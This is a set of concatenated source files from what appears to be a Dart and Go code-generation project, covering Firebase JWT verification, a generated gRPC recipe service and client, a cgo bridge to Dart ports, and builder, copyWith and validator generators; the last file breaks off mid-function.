import 'dart:convert';
import 'package:jose/jose.dart';
import 'package:http/http.dart' as http;
import 'package:squarealfa_security/squarealfa_security.dart';
import 'invalid_signature_exception.dart';
class FirebaseTokenHandler {
static Future<JwtPayload> getJwtPayload(String idToken) async {
final _idToken =
idToken.startsWith('Bearer ') ? idToken.substring(7) : idToken;
final b64Header = _idToken.split('.')[0];
var jsonHeader = decodeB64Json(b64Header);
final map = jsonDecode(jsonHeader);
final keyId = map['kid'];
final ks = await _getKeyStore(keyId);
final jwt = await JsonWebToken.decodeAndVerify(_idToken, ks);
if (!(jwt.isVerified ?? false)) {
throw InvalidSignatureException();
}
final claims = jwt.claims;
final payload = JwtPayload(
audience: claims.audience?.first ?? '',
expires: claims.expiry ?? DateTime.now(),
issuer: claims.issuer?.toString() ?? '',
name: claims.getTyped('name') ?? '',
notBefore:
claims.notBefore ?? DateTime.now().subtract(Duration(seconds: 1)),
subject: claims.getTyped('sub'),
email: claims.getTyped('email'),
emailVerified: claims.getTyped('email_verified'),
tenantId: claims.getTyped('tenantId') ?? '',
tid: claims.getTyped('tid') ?? '',
permissions: claims.getTypedList<String>('scp') ?? const <String>[],
isAdministrator: claims.getTyped('adm') ?? false,
isVerified: true,
);
return payload;
}
}
var _keyStores = <String, JsonWebKeyStore>{};
Future<JsonWebKeyStore> _getKeyStore(String keyId) async {
if (!_keyStores.containsKey(keyId)) {
await _updateKeyCache();
}
final key = _keyStores[keyId];
return key!;
}
Future<void> _updateKeyCache() async {
final response = await http.get(Uri.parse(
'https://www.googleapis.com/robot/v1/metadata/x509/secure<EMAIL>'));
final rkeys = response.body;
final jKeys = jsonDecode(rkeys) as Map<String, dynamic>;
_keyStores = jKeys.map((kid, v) {
final existing = _keyStores[kid];
if (existing != null) {
return MapEntry<String, JsonWebKeyStore>(kid, existing);
}
final newKeyStore = JsonWebKeyStore()
..addKey(JsonWebKey.fromPem(v, keyId: kid));
return MapEntry<String, JsonWebKeyStore>(kid, newKeyStore);
});
}
<|start_filename|>proto_mapper/test/lib/src/recipe_services_base.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'recipe_services_base.dart';
// **************************************************************************
// ProtoServicesServiceGenerator
// **************************************************************************
typedef RecipeServiceFactory = RecipeServiceBase Function(ServiceCall call);
class GRecipeService extends GRecipeServiceBase {
final RecipeServiceFactory $serviceFactory;
final void Function(ServiceCall call) $authenticator;
GRecipeService(
this.$serviceFactory,
this.$authenticator,
);
@override
void $onMetadata(ServiceCall context) {
$authenticator(context);
}
@override
Future<GRecipe> create(
ServiceCall call,
GRecipe request,
) async {
final service = $serviceFactory(call);
final entity = request.toRecipe();
final $result = await service.create(entity);
final proto = $result.toProto();
return proto;
}
@override
Future<GRecipe> update(
ServiceCall call,
GRecipe request,
) async {
final service = $serviceFactory(call);
final entity = request.toRecipe();
final $result = await service.update(entity);
final proto = $result.toProto();
return proto;
}
@override
Future<G_GRecipeService_Delete_Return> delete(
ServiceCall call,
GKey request,
) async {
final service = $serviceFactory(call);
final entity = request.toKey();
await service.delete(entity);
final proto = G_GRecipeService_Delete_Return();
return proto;
}
@override
Future<GRecipe> get(
ServiceCall call,
GKey request,
) async {
final service = $serviceFactory(call);
final entity = request.toKey();
final $result = await service.get(entity);
final proto = $result.toProto();
return proto;
}
@override
Future<GListOfRecipe> search(
ServiceCall call,
G_GRecipeService_Search_Parameters request,
) async {
final service = $serviceFactory(call);
final $result = await service.search();
final proto = GListOfRecipe()
..items.addAll($result.map((i) => i.toProto()));
return proto;
}
@override
Future<G_GRecipeService_SearchNullable_Return> searchNullable(
ServiceCall call,
G_GRecipeService_SearchNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.searchNullable();
final proto = G_GRecipeService_SearchNullable_Return();
proto.value
.addAll(value?.map((e) => const $RecipeProtoMapper().toProto(e)) ?? []);
proto.valueHasValue = value != null;
return proto;
}
@override
Future<G_GRecipeService_InsertMany_Return> insertMany(
ServiceCall call,
GListOfRecipe request,
) async {
final service = $serviceFactory(call);
final entity = request.items.map((i) => i.toRecipe()).toList();
await service.insertMany(entity);
final proto = G_GRecipeService_InsertMany_Return();
return proto;
}
@override
Future<G_GRecipeService_GetNullable_Return> getNullable(
ServiceCall call,
G_GRecipeService_GetNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getNullable();
final proto = G_GRecipeService_GetNullable_Return();
if (value != null) {
proto.value = const $RecipeProtoMapper().toProto(value);
}
proto.valueHasValue = value != null;
return proto;
}
@override
Future<G_GRecipeService_Count_Return> count(
ServiceCall call,
G_GRecipeService_Count_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.count();
final proto = G_GRecipeService_Count_Return();
proto.value = value;
return proto;
}
@override
Future<G_GRecipeService_CountNullable_Return> countNullable(
ServiceCall call,
G_GRecipeService_CountNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final p0 = request.returnNull;
final value = await service.countNullable(
p0,
);
final proto = G_GRecipeService_CountNullable_Return();
if (value != null) {
proto.value = value;
}
proto.valueHasValue = value != null;
return proto;
}
@override
Future<G_GRecipeService_Reindex_Return> reindex(
ServiceCall call,
G_GRecipeService_Reindex_Parameters request,
) async {
final service = $serviceFactory(call);
await service.reindex();
final proto = G_GRecipeService_Reindex_Return();
return proto;
}
@override
Future<G_GRecipeService_GetMainRecipeType_Return> getMainRecipeType(
ServiceCall call,
G_GRecipeService_GetMainRecipeType_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getMainRecipeType();
final proto = G_GRecipeService_GetMainRecipeType_Return();
proto.value = GRecipeTypes.valueOf(value.index)!;
return proto;
}
@override
Future<G_GRecipeService_GetMainRecipeTypeNullable_Return>
getMainRecipeTypeNullable(
ServiceCall call,
G_GRecipeService_GetMainRecipeTypeNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getMainRecipeTypeNullable();
final proto = G_GRecipeService_GetMainRecipeTypeNullable_Return();
if (value != null) {
proto.value = GRecipeTypes.valueOf(value.index)!;
}
proto.valueHasValue = value != null;
return proto;
}
@override
Future<G_GRecipeService_GetRecipeTypeList_Return> getRecipeTypeList(
ServiceCall call,
G_GRecipeService_GetRecipeTypeList_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getRecipeTypeList();
final proto = G_GRecipeService_GetRecipeTypeList_Return();
proto.value
.addAll(value.map((e) => const $RecipeTypesProtoMapper().toProto(e)));
return proto;
}
@override
Future<G_GRecipeService_GetRecipeTypeListNullable_Return>
getRecipeTypeListNullable(
ServiceCall call,
G_GRecipeService_GetRecipeTypeListNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getRecipeTypeListNullable();
final proto = G_GRecipeService_GetRecipeTypeListNullable_Return();
proto.value.addAll(
value?.map((e) => const $RecipeTypesProtoMapper().toProto(e)) ?? []);
proto.valueHasValue = value != null;
return proto;
}
@override
Future<G_GRecipeService_GetListOfInts_Return> getListOfInts(
ServiceCall call,
G_GRecipeService_GetListOfInts_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getListOfInts();
final proto = G_GRecipeService_GetListOfInts_Return();
proto.value.addAll(value);
return proto;
}
@override
Future<G_GRecipeService_GetListOfIntsNullable_Return> getListOfIntsNullable(
ServiceCall call,
G_GRecipeService_GetListOfIntsNullable_Parameters request,
) async {
final service = $serviceFactory(call);
final value = await service.getListOfIntsNullable();
final proto = G_GRecipeService_GetListOfIntsNullable_Return();
proto.value.addAll(value ?? []);
proto.valueHasValue = value != null;
return proto;
}
@override
Future<GCalcResult> doCalculation(
ServiceCall call,
GCalcParameters request,
) async {
final service = $serviceFactory(call);
final entity = request.toCalcParameters();
final $result = await service.doCalculation(entity);
final proto = $result.toProto();
return proto;
}
@override
Future<G_GRecipeService_ReceiveLotsOfArgs_Return> receiveLotsOfArgs(
ServiceCall call,
G_GRecipeService_ReceiveLotsOfArgs_Parameters request,
) async {
final service = $serviceFactory(call);
final p0 = request.pString;
final p1 = request.pInt;
final p2 = RecipeTypes.values[request.pRecipeTypes.value];
final p3 = const $RecipeProtoMapper().fromProto(request.pRecipe);
final p4 = List<String>.unmodifiable(request.pListStrings.map((e) => e));
final p5 = List<int>.unmodifiable(request.pListInts.map((e) => e));
final p6 = List<RecipeTypes>.unmodifiable(request.pListRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e)));
final p7 = List<Recipe>.unmodifiable(request.pListRecipes
.map((e) => const $RecipeProtoMapper().fromProto(e)));
final p8 = Set<String>.unmodifiable(request.pSetString.map((e) => e));
final p9 = Set<int>.unmodifiable(request.pSetInt.map((e) => e));
final p10 = Set<RecipeTypes>.unmodifiable(request.pSetRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e)));
final p11 = Set<Recipe>.unmodifiable(
request.pSetRecipe.map((e) => const $RecipeProtoMapper().fromProto(e)));
final p12 =
List<String>.unmodifiable(request.pIterableString.map((e) => e));
final p13 = List<int>.unmodifiable(request.pIterableInt.map((e) => e));
final p14 = List<RecipeTypes>.unmodifiable(request.pIterableRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e)));
final p15 = List<Recipe>.unmodifiable(request.pIterableRecipe
.map((e) => const $RecipeProtoMapper().fromProto(e)));
await service.receiveLotsOfArgs(
p0,
p1,
p2,
p3,
p4,
p5,
p6,
p7,
p8,
p9,
p10,
p11,
p12,
p13,
p14,
p15,
);
final proto = G_GRecipeService_ReceiveLotsOfArgs_Return();
return proto;
}
@override
Future<G_GRecipeService_ReceiveLotsOfNullableArgs_Return>
receiveLotsOfNullableArgs(
ServiceCall call,
G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters request,
) async {
final service = $serviceFactory(call);
final p0 = (request.pStringHasValue ? (request.pString) : null);
final p1 = (request.pIntHasValue ? (request.pInt) : null);
final p2 = (request.pRecipeTypesHasValue
? (RecipeTypes.values[request.pRecipeTypes.value])
: null);
final p3 = (request.pRecipeHasValue
? (const $RecipeProtoMapper().fromProto(request.pRecipe))
: null);
final p4 = (request.pListStringsHasValue
? (List<String>.unmodifiable(request.pListStrings.map((e) => e)))
: null);
final p5 = (request.pListIntsHasValue
? (List<int>.unmodifiable(request.pListInts.map((e) => e)))
: null);
final p6 = (request.pListRecipeTypesHasValue
? (List<RecipeTypes>.unmodifiable(request.pListRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e))))
: null);
final p7 = (request.pListRecipesHasValue
? (List<Recipe>.unmodifiable(request.pListRecipes
.map((e) => const $RecipeProtoMapper().fromProto(e))))
: null);
final p8 = (request.pSetStringHasValue
? (Set<String>.unmodifiable(request.pSetString.map((e) => e)))
: null);
final p9 = (request.pSetIntHasValue
? (Set<int>.unmodifiable(request.pSetInt.map((e) => e)))
: null);
final p10 = (request.pSetRecipeTypesHasValue
? (Set<RecipeTypes>.unmodifiable(request.pSetRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e))))
: null);
final p11 = (request.pSetRecipeHasValue
? (Set<Recipe>.unmodifiable(request.pSetRecipe
.map((e) => const $RecipeProtoMapper().fromProto(e))))
: null);
final p12 = (request.pIterableStringHasValue
? (List<String>.unmodifiable(request.pIterableString.map((e) => e)))
: null);
final p13 = (request.pIterableIntHasValue
? (List<int>.unmodifiable(request.pIterableInt.map((e) => e)))
: null);
final p14 = (request.pIterableRecipeTypesHasValue
? (List<RecipeTypes>.unmodifiable(request.pIterableRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().fromProto(e))))
: null);
final p15 = (request.pIterableRecipeHasValue
? (List<Recipe>.unmodifiable(request.pIterableRecipe
.map((e) => const $RecipeProtoMapper().fromProto(e))))
: null);
final value = await service.receiveLotsOfNullableArgs(
p0,
p1,
p2,
p3,
p4,
p5,
p6,
p7,
p8,
p9,
p10,
p11,
p12,
p13,
p14,
p15,
);
final proto = G_GRecipeService_ReceiveLotsOfNullableArgs_Return();
proto.value.addAll(value);
return proto;
}
}
// **************************************************************************
// ProtoServicesClientGenerator
// **************************************************************************
abstract class RecipeServiceClientBase implements RecipeServiceBase {
Future<GRecipeServiceClient> getGServiceClient();
@override
Future<Recipe> create(
Recipe entity,
) async {
final serviceClient = await getGServiceClient();
final $parm = entity.toProto();
final $result = await serviceClient.create($parm);
final $ret = $result.toRecipe();
return $ret;
}
@override
Future<Recipe> update(
Recipe entity,
) async {
final serviceClient = await getGServiceClient();
final $parm = entity.toProto();
final $result = await serviceClient.update($parm);
final $ret = $result.toRecipe();
return $ret;
}
@override
Future<void> delete(
Key key,
) async {
final serviceClient = await getGServiceClient();
final $parm = key.toProto();
await serviceClient.delete($parm);
}
@override
Future<Recipe> get(
Key key,
) async {
final serviceClient = await getGServiceClient();
final $parm = key.toProto();
final $result = await serviceClient.get($parm);
final $ret = $result.toRecipe();
return $ret;
}
@override
Future<List<Recipe>> search() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_Search_Parameters();
final $result = await serviceClient.search($parm);
final $ret = $result.items.map((i) => i.toRecipe()).toList();
return $ret;
}
@override
Future<List<Recipe>?> searchNullable() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_SearchNullable_Parameters();
final $result = await serviceClient.searchNullable($parm);
final $ret = ($result.valueHasValue
? (List<Recipe>.unmodifiable(
$result.value.map((e) => const $RecipeProtoMapper().fromProto(e))))
: null);
return $ret;
}
@override
Future<void> insertMany(
List<Recipe> recipes,
) async {
final serviceClient = await getGServiceClient();
final $parm = GListOfRecipe(items: recipes.map((i) => i.toProto()));
await serviceClient.insertMany($parm);
}
@override
Future<Recipe?> getNullable() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetNullable_Parameters();
final $result = await serviceClient.getNullable($parm);
final $ret = ($result.valueHasValue
? (const $RecipeProtoMapper().fromProto($result.value))
: null);
return $ret;
}
@override
Future<int> count() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_Count_Parameters();
final $result = await serviceClient.count($parm);
final $ret = $result.value;
return $ret;
}
@override
Future<int?> countNullable(
bool returnNull,
) async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_CountNullable_Parameters();
$parm.returnNull = returnNull;
final $result = await serviceClient.countNullable($parm);
final $ret = ($result.valueHasValue ? ($result.value) : null);
return $ret;
}
@override
Future<void> reindex() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_Reindex_Parameters();
await serviceClient.reindex($parm);
}
@override
Future<RecipeTypes> getMainRecipeType() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetMainRecipeType_Parameters();
final $result = await serviceClient.getMainRecipeType($parm);
final $ret = RecipeTypes.values[$result.value.value];
return $ret;
}
@override
Future<RecipeTypes?> getMainRecipeTypeNullable() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetMainRecipeTypeNullable_Parameters();
final $result = await serviceClient.getMainRecipeTypeNullable($parm);
final $ret = ($result.valueHasValue
? (RecipeTypes.values[$result.value.value])
: null);
return $ret;
}
@override
Future<List<RecipeTypes>> getRecipeTypeList() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetRecipeTypeList_Parameters();
final $result = await serviceClient.getRecipeTypeList($parm);
final $ret = List<RecipeTypes>.unmodifiable(
$result.value.map((e) => const $RecipeTypesProtoMapper().fromProto(e)));
return $ret;
}
@override
Future<List<RecipeTypes>?> getRecipeTypeListNullable() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetRecipeTypeListNullable_Parameters();
final $result = await serviceClient.getRecipeTypeListNullable($parm);
final $ret = ($result.valueHasValue
? (List<RecipeTypes>.unmodifiable($result.value
.map((e) => const $RecipeTypesProtoMapper().fromProto(e))))
: null);
return $ret;
}
@override
Future<List<int>> getListOfInts() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetListOfInts_Parameters();
final $result = await serviceClient.getListOfInts($parm);
final $ret = List<int>.unmodifiable($result.value.map((e) => e));
return $ret;
}
@override
Future<List<int>?> getListOfIntsNullable() async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_GetListOfIntsNullable_Parameters();
final $result = await serviceClient.getListOfIntsNullable($parm);
final $ret = ($result.valueHasValue
? (List<int>.unmodifiable($result.value.map((e) => e)))
: null);
return $ret;
}
@override
Future<CalcResult> doCalculation(
CalcParameters parameters,
) async {
final serviceClient = await getGServiceClient();
final $parm = parameters.toProto();
final $result = await serviceClient.doCalculation($parm);
final $ret = $result.toCalcResult();
return $ret;
}
@override
Future<void> receiveLotsOfArgs(
String pString,
int pInt,
RecipeTypes pRecipeTypes,
Recipe pRecipe,
List<String> pListStrings,
List<int> pListInts,
List<RecipeTypes> pListRecipeTypes,
List<Recipe> pListRecipes,
Set<String> pSetString,
Set<int> pSetInt,
Set<RecipeTypes> pSetRecipeTypes,
Set<Recipe> pSetRecipe,
Iterable<String> pIterableString,
Iterable<int> pIterableInt,
Iterable<RecipeTypes> pIterableRecipeTypes,
Iterable<Recipe> pIterableRecipe,
) async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_ReceiveLotsOfArgs_Parameters();
$parm.pString = pString;
$parm.pInt = pInt;
$parm.pRecipeTypes = GRecipeTypes.valueOf(pRecipeTypes.index)!;
$parm.pRecipe = const $RecipeProtoMapper().toProto(pRecipe);
$parm.pListStrings.addAll(pListStrings);
$parm.pListInts.addAll(pListInts);
$parm.pListRecipeTypes.addAll(pListRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().toProto(e)));
$parm.pListRecipes
.addAll(pListRecipes.map((e) => const $RecipeProtoMapper().toProto(e)));
$parm.pSetString.addAll(pSetString);
$parm.pSetInt.addAll(pSetInt);
$parm.pSetRecipeTypes.addAll(
pSetRecipeTypes.map((e) => const $RecipeTypesProtoMapper().toProto(e)));
$parm.pSetRecipe
.addAll(pSetRecipe.map((e) => const $RecipeProtoMapper().toProto(e)));
$parm.pIterableString.addAll(pIterableString);
$parm.pIterableInt.addAll(pIterableInt);
$parm.pIterableRecipeTypes.addAll(pIterableRecipeTypes
.map((e) => const $RecipeTypesProtoMapper().toProto(e)));
$parm.pIterableRecipe.addAll(
pIterableRecipe.map((e) => const $RecipeProtoMapper().toProto(e)));
await serviceClient.receiveLotsOfArgs($parm);
}
@override
Future<List<int>> receiveLotsOfNullableArgs(
String? pString,
int? pInt,
RecipeTypes? pRecipeTypes,
Recipe? pRecipe,
List<String>? pListStrings,
List<int>? pListInts,
List<RecipeTypes>? pListRecipeTypes,
List<Recipe>? pListRecipes,
Set<String>? pSetString,
Set<int>? pSetInt,
Set<RecipeTypes>? pSetRecipeTypes,
Set<Recipe>? pSetRecipe,
Iterable<String>? pIterableString,
Iterable<int>? pIterableInt,
Iterable<RecipeTypes>? pIterableRecipeTypes,
Iterable<Recipe>? pIterableRecipe,
) async {
final serviceClient = await getGServiceClient();
final $parm = G_GRecipeService_ReceiveLotsOfNullableArgs_Parameters();
if (pString != null) {
$parm.pString = pString;
}
$parm.pStringHasValue = pString != null;
if (pInt != null) {
$parm.pInt = pInt;
}
$parm.pIntHasValue = pInt != null;
if (pRecipeTypes != null) {
$parm.pRecipeTypes = GRecipeTypes.valueOf(pRecipeTypes.index)!;
}
$parm.pRecipeTypesHasValue = pRecipeTypes != null;
if (pRecipe != null) {
$parm.pRecipe = const $RecipeProtoMapper().toProto(pRecipe);
}
$parm.pRecipeHasValue = pRecipe != null;
$parm.pListStrings.addAll(pListStrings ?? []);
$parm.pListStringsHasValue = pListStrings != null;
$parm.pListInts.addAll(pListInts ?? []);
$parm.pListIntsHasValue = pListInts != null;
$parm.pListRecipeTypes.addAll(pListRecipeTypes
?.map((e) => const $RecipeTypesProtoMapper().toProto(e)) ??
[]);
$parm.pListRecipeTypesHasValue = pListRecipeTypes != null;
$parm.pListRecipes.addAll(
pListRecipes?.map((e) => const $RecipeProtoMapper().toProto(e)) ?? []);
$parm.pListRecipesHasValue = pListRecipes != null;
$parm.pSetString.addAll(pSetString ?? []);
$parm.pSetStringHasValue = pSetString != null;
$parm.pSetInt.addAll(pSetInt ?? []);
$parm.pSetIntHasValue = pSetInt != null;
$parm.pSetRecipeTypes.addAll(pSetRecipeTypes
?.map((e) => const $RecipeTypesProtoMapper().toProto(e)) ??
[]);
$parm.pSetRecipeTypesHasValue = pSetRecipeTypes != null;
$parm.pSetRecipe.addAll(
pSetRecipe?.map((e) => const $RecipeProtoMapper().toProto(e)) ?? []);
$parm.pSetRecipeHasValue = pSetRecipe != null;
$parm.pIterableString.addAll(pIterableString ?? []);
$parm.pIterableStringHasValue = pIterableString != null;
$parm.pIterableInt.addAll(pIterableInt ?? []);
$parm.pIterableIntHasValue = pIterableInt != null;
$parm.pIterableRecipeTypes.addAll(pIterableRecipeTypes
?.map((e) => const $RecipeTypesProtoMapper().toProto(e)) ??
[]);
$parm.pIterableRecipeTypesHasValue = pIterableRecipeTypes != null;
$parm.pIterableRecipe.addAll(
pIterableRecipe?.map((e) => const $RecipeProtoMapper().toProto(e)) ??
[]);
$parm.pIterableRecipeHasValue = pIterableRecipe != null;
final $result = await serviceClient.receiveLotsOfNullableArgs($parm);
final $ret = List<int>.unmodifiable($result.value.map((e) => e));
return $ret;
}
}
<|start_filename|>firebase-auth-admin/go/dart_api_dl/dart_api_dl.go<|end_filename|>
package dart_api_dl
// #include <stdlib.h>
// #include "stdint.h"
// #include "include/dart_api_dl.c"
//
// // Go does not allow calling C function pointers directly. So we are
// // forced to provide a trampoline.
// bool GoDart_PostCObject(Dart_Port_DL port, Dart_CObject* obj) {
// return Dart_PostCObject_DL(port, obj);
// }
import "C"
import (
"encoding/json"
"unsafe"
)
func Init(api unsafe.Pointer) {
if C.Dart_InitializeApiDL(api) != 0 {
panic("failed to initialize Dart DL C API: version mismatch. " +
"must update include/ to match Dart SDK version")
}
}
func SendInt64ToPort(port int64, msg int64) {
var obj C.Dart_CObject
obj._type = C.Dart_CObject_kInt64
// cgo does not support unions so we are forced to do this
*(*C.int64_t)(unsafe.Pointer(&obj.value)) = C.int64_t(msg)
C.GoDart_PostCObject(C.long(port), &obj)
}
func SendDataToPort(port int64, msg string) {
data := make(map[string]interface{})
data["data"] = msg
SendMapToPort(port, data)
}
func SendErrorToPort(port int64, err error) {
data := make(map[string]interface{})
data["error"] = err.Error()
json, err := json.Marshal(data)
var strJson string
if err != nil {
strJson = "Error marshalling error message"
} else {
strJson = string(json)
}
SendStringToPort(port, strJson)
}
func SendMapToPort(port int64, data map[string]interface{}) {
json, err := json.Marshal(data)
if err != nil {
SendErrorToPort(port, err)
}
SendStringToPort(port, string(json))
}
func SendStringToPort(port int64, value string) {
ret := C.CString(value)
var obj C.Dart_CObject
obj._type = C.Dart_CObject_kString
// cgo does not support unions so we are forced to do this
*(**C.char)(unsafe.Pointer(&obj.value)) = ret
C.GoDart_PostCObject(C.long(port), &obj)
C.free(unsafe.Pointer(ret))
}
<|start_filename|>entity/entity_generator/lib/src/copywith_generator/copywith_generator.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:build/build.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
import 'field_descriptor.dart';
class CopyWithGenerator extends GeneratorForAnnotation<CopyWith> {
late String _className;
CopyWithGenerator(BuilderOptions options);
@override
String generateForAnnotatedElement(
Element element,
ConstantReader annotation,
BuildStep buildStep,
) {
var classElement = element.asClassElement();
if (classElement.kind == ElementKind.ENUM) return '';
_className = classElement.name;
if (classElement.kind == ElementKind.ENUM) return '';
var fieldDescriptors = _getFieldDescriptors(classElement);
if (fieldDescriptors.isEmpty) return '';
var renderBuffer = StringBuffer();
renderBuffer.writeln(_renderCopyWithExtension(fieldDescriptors));
return renderBuffer.toString();
}
String _renderCopyWithExtension(Iterable<FieldDescriptor> fieldDescriptors) {
var className = _className;
var copyWithParameterFieldBuffer = StringBuffer();
var copyWithAssignmentFieldBuffer = StringBuffer();
for (var fieldDescriptor in fieldDescriptors) {
copyWithParameterFieldBuffer.writeln(
'${fieldDescriptor.fieldElementTypeName}? ${fieldDescriptor.displayName},');
var resetFieldName = fieldDescriptor.isNullable
? 'set${fieldDescriptor.pascalName}ToNull'
: null;
if (resetFieldName != null) {
copyWithParameterFieldBuffer.writeln('bool $resetFieldName = false,');
}
copyWithAssignmentFieldBuffer.writeln(
'''${fieldDescriptor.displayName}: ${resetFieldName == null ? '' : '$resetFieldName ? null :'} ${fieldDescriptor.displayName} ?? this.${fieldDescriptor.displayName},''',
);
}
var copyWithExtension = '''
extension \$${className}CopyWithExtension on $className {
$className copyWith({
$copyWithParameterFieldBuffer
}) {
return $className(
$copyWithAssignmentFieldBuffer
);
}
}
''';
return copyWithExtension;
}
}
Iterable<FieldDescriptor> _getFieldDescriptors(ClassElement classElement) {
final fieldSet = classElement.getSortedFieldSet();
final fieldDescriptors = fieldSet
.map((fieldElement) => FieldDescriptor.fromFieldElement(fieldElement));
return fieldDescriptors;
}
<|start_filename|>grpc_host/lib/src/security/security.dart<|end_filename|>
export 'authentication_extensions.dart';
export 'principal.dart';
<|start_filename|>entity/entity_generator/lib/src/builder_generator/builder_generator.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:build/build.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
import 'field_code_generator.dart';
import 'field_descriptor.dart';
class BuilderGenerator extends GeneratorForAnnotation<BuildBuilder> {
late String _className;
BuilderGenerator(BuilderOptions options);
@override
String generateForAnnotatedElement(
Element element,
ConstantReader annotation,
BuildStep buildStep,
) {
final readAnnotation = _hydrateAnnotation(annotation);
var classElement = element.asClassElement();
if (classElement.kind == ElementKind.ENUM) return '';
_className = classElement.name;
if (classElement.kind == ElementKind.ENUM) return '';
var fieldDescriptors = _getFieldDescriptors(classElement);
if (fieldDescriptors.isEmpty) return '';
var renderBuffer = StringBuffer();
renderBuffer.writeln(_renderBuilder(readAnnotation, fieldDescriptors));
return renderBuffer.toString();
}
String _renderBuilder(
BuildBuilder builder,
Iterable<FieldDescriptor> fieldDescriptors,
) {
final className = _className;
final builderClassName =
'\$${className}Builder${builder.createBuilderBaseClass ? 'Base' : ''}';
final fieldBuffer = StringBuffer();
final assignmentBuffer = StringBuffer();
final constructorBuffer = StringBuffer();
final constructorAssignmentBuffer = StringBuffer();
final constructorStatementBuffer = StringBuffer();
final entityConstructorBuffer = StringBuffer();
var usesDefaultsProvider = false;
for (var fieldDescriptor in fieldDescriptors) {
var gen = FieldCodeGenerator.fromFieldDescriptor(
fieldDescriptor,
builder,
);
usesDefaultsProvider = usesDefaultsProvider || gen.usesDefaultsProvided;
fieldBuffer.writeln(gen.fieldDeclaration);
constructorBuffer.writeln(gen.constructorDeclaration);
final constructorStatement = gen.constructorStatement;
if (constructorStatement.isNotEmpty) {
constructorStatementBuffer.writeln(constructorStatement);
}
final constructorAssignment = gen.constructorAssignment;
if (constructorAssignment.isNotEmpty) {
constructorAssignmentBuffer.write(
'''${constructorAssignmentBuffer.length == 0 ? ':' : ','} $constructorAssignment''');
}
assignmentBuffer.writeln(gen.toBuilderMap);
entityConstructorBuffer.writeln(gen.entityConstructorMap);
}
final extensionClass = builder.createBuilderBaseClass
? '''
extension \$${className}BuilderExtension on $className {
$className rebuild() {
final builder = \$${className}Builder.from$className(this);
final entity = builder.build();
return entity;
}
}
'''
: '';
final defaultsProvider = usesDefaultsProvider
? 'final _defaultsProvider = \$${className}DefaultsProvider();'
: '';
final constructorStatement = constructorStatementBuffer.isEmpty
? ';'
: '''{
$constructorStatementBuffer
}''';
var ret = '''
class $builderClassName implements Builder<$className> {
$defaultsProvider
$fieldBuffer
$builderClassName({ $constructorBuffer })
$constructorAssignmentBuffer
$constructorStatement
$builderClassName.from$className($className entity)
: this($assignmentBuffer);
@override
$className build() {
final entity = _build();
const \$${className}Validator().validateThrowing(entity);
return entity;
}
@override
BuildResult<$className> tryBuild() {
try {
final entity = _build();
final errors = \$${className}Validator().validate(entity);
final result =
BuildResult<$className>(result: entity, validationErrors: errors);
return result;
} catch (ex) {
return BuildResult<$className>(exception: ex);
}
}
$className _build() {
var entity = $className(
$entityConstructorBuffer
);
return entity;
}
}
$extensionClass
''';
return ret;
}
}
Iterable<FieldDescriptor> _getFieldDescriptors(ClassElement classElement) {
final fieldSet = classElement.getSortedFieldSet();
final fieldDescriptors = fieldSet
.map((fieldElement) => FieldDescriptor.fromFieldElement(fieldElement));
return fieldDescriptors;
}
BuildBuilder _hydrateAnnotation(ConstantReader reader) {
var validatable = BuildBuilder(
createBuilderBaseClass: reader.read('createBuilderBaseClass').boolValue,
useDefaultsProvider: reader.read('useDefaultsProvider').boolValue);
return validatable;
}
<|start_filename|>entity/entity_generator/lib/src/validation/validator_generator.dart<|end_filename|>
import 'package:analyzer/dart/element/element.dart';
import 'package:build/build.dart';
import 'package:source_gen/source_gen.dart';
import 'package:squarealfa_entity_annotations/squarealfa_entity_annotations.dart';
import 'package:squarealfa_entity_generator/src/validation/validators/regular_expression_validator.dart';
import 'package:squarealfa_generators_common/squarealfa_generators_common.dart';
import 'field_descriptor.dart';
import 'validators/email_address_validator.dart';
import 'validators/property_validator.dart';
import 'validators/range_validator.dart';
import 'validators/required_validator.dart';
import 'validators/string_length_validator.dart';
class ValidatorGenerator extends GeneratorForAnnotation<Validatable> {
@override
String generateForAnnotatedElement(
Element element,
ConstantReader annotation,
BuildStep buildStep,
) {
final validatable = _hydrateAnnotation(annotation);
final createBaseClass = validatable.createValidatableBaseClass;
try {
